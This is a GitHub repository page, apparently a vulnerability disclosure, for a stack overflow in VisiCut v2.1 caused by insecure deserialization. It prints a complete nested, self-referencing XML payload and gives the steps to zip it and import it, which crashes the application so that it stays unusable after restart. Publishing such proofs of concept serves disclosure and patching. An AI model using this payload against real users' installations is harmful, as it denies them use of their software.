Skip to content

Gelcon/PoC-of-VisiCut2_1-Stack-Overflow-Vul

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
file
file
 
 
img
img
 
 
video
video
 
 
README.md
README.md
 
 

Repository files navigation

VisiCut V2.1 Stack Overflow due to Insecure Deserialization

Affected Version: <= v2.1(latest stable release version)

Application: Here

Insecure Deserialization Vulnerability

<set>
  <set>
    <set>
      <set>
        <set>
          <set>
            <set>
              <string>a</string>
            </set>
            <set>
              <string>b</string>
            </set>
          </set>
          <set>
            <string>c</string>
            <set reference='../../../set/set[2]'/>
          </set>
        </set>
      </set>
    </set>
  </set>
</set>

After saving the above code as settings.xml file, put it into a folder named settings, and package the folder into a zip file. Double-click VisiCut.exe to start the software, and click "FromFile" in the interface to upload the zip file to trigger the stack overflow vulnerability.

Exploit

Double-click VisiCut.exe to start the software, and click "FromFile" in the interface to upload the zip file.

image-20241024213639889

image-20241024213656146

The stack overflow vulnerability occured.

image-20241024213707874

image-20241024213721299

If you try to start the application again, the stack overflow vulnerability will continue to be triggered and you will not be able to use the software again.

image-20241024213832246

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published